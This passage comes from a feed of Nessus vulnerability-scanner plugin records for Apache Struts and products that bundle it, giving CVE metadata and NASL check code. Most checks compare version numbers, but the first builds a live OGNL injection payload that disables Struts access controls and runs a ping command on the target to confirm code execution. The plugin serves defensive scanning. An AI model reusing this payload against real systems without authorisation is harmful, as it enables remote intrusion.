"2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/90152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90152);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-0785\");\n\n script_name(english:\"Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Apache Struts 2, a web\nframework that utilizes OGNL (Object-Graph Navigation Language) as an\nexpression language. A remote code execution vulnerability exists due\nto double OGNL evaluation of attribute values assigned to certain\ntags. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted request, to execute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a\nStruts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-029.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2328.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28 or later. Alternatively, apply\nthe workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0785\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping -n 3 -l 500 \" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping -c 3 -p \" + pat + \" \" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\nping_cmd = urlencode(\n str : ping_cmd,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n);\n\nforeach url (urls)\n{\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n if (empty_or_null(cgi_args))\n {\n url = ereg_replace(pattern:\"\\.(act(ion)?|jsp|do)$\", string:url, replace:\"\");\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n }\n\n attack = \"\";\n exp_payload = \"%27),%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtectedAccess%27]=true,%23_memberAccess[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23a=@java.lang.Runtime@getRuntime(),%23a.exec(%27\"+ping_cmd+\"%27),new%20java.lang.String(%27\";\n\n # Build a string with CGI arguments set to the exploit string\n if (empty_or_null(cgi_args))\n attack_url = url + \"?\" + exp_payload;\n else\n {\n foreach arg (cgi_args)\n {\n attack += (arg + \"=\" + exp_payload);\n }\n attack_url = url + \"?\" + attack;\n }\n\n # Craft GET request\n get_req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n 'Accept-Language: en-US\\n' +\n 'Connection: Keep-Alive\\n\\n';\n\n s = send_capture(socket:soc,data:get_req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n# Stop after first vulnerable Struts app is found\nif (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:58:32", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a remote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. A remote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code into the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117401", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117401);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1966\");\n script_bugtraq_id(60166);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a\nremote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. A\nremote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code\ninto the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.exploit-db.com/exploits/25980\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3ab6fd3\");\n # https://cwiki.apache.org/confluence/display/WW/S2-013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0b2a9311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1966\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.14', 'fixed_version' : '2.3.14.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:14", "description": "According to its self-reported version, the instance of Apache Archiva hosted on the remote web server is 1.2.x prior than or equal to 1.2.2 or 1.3.x prior than or equal to 1.3.6 and thus is affected by the following vulnerabilities :\n\n - An input validation error exists related to unspecified scripts and unspecified parameters that could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled version of Apache Struts that could allow arbitrary Object-Graph Navigation Language (OGNL) expression execution via specially crafted requests.\n (CVE-2013-2251)", "cvss3": {"score": null, "vector": null}, "published": "2014-04-29T00:00:00", "type": "nessus", "title": "Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2187", "CVE-2013-2251"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:archiva"], "id": "ARCHIVA_1_3_8.NASL", "href": "https://www.tenable.com/plugins/nessus/73761", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73761);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2187\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 66991, 66998);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://archiva.apache.org/security.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://commons.apache.org/proper/commons-ognl/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:archiva\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"archiva_detect.nasl\");\n script_require_keys(\"www/archiva\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\ninstall = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port, qs:dir+'/index.action');\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Apache Archiva\", install_url);\n\nif (version !~ \"^1\\.[23]($|\\.)\") audit(AUDIT_WEB_APP_NOT_INST, \"Apache Archiva 1.2.x / 1.3.x\", port);\n\n# Affected (per NVD) :\n# 1.2.x <= 1.2.2\n# 1.3.x <= 1.3.6\n# Fixed (per vendor) :\n# 1.3.8\n# 2.0.1\nif (\n version =~ \"^1\\.2($|[^0-9.])\" ||\n version =~ \"^1\\.2\\.[012]($|[^0-9])\" ||\n version =~ \"^1\\.3($|[^0-9.])\" ||\n version =~ \"^1\\.3\\.[0-6]($|[^0-9])\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.8 / 2.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Apache Archiva\", install_url, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T15:48:34", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. (CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default.\n (CVE-2013-4316)", "cvss3": {"score": null, "vector": null}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251", "CVE-2013-4316"], "modified": "2022-03-28T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL", "href": "https://www.tenable.com/plugins/nessus/83292", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83292);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2013-2251\", \"CVE-2013-4316\");\n script_bugtraq_id(61189, 62587);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by the multiple vulnerabilities\nin the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution\n of arbitrary Object-Graph Navigation Language (OGNL)\n expressions via specially crafted parameters to the\n DefaultActionMapper. (CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to\n dynamic method invocation being enabled by default.\n (CVE-2013-4316)\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ac29c174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 2.3.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.14\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:15", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117362);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 61196);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.1. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-017\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15\", \"fixed_version\" : \"2.3.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": 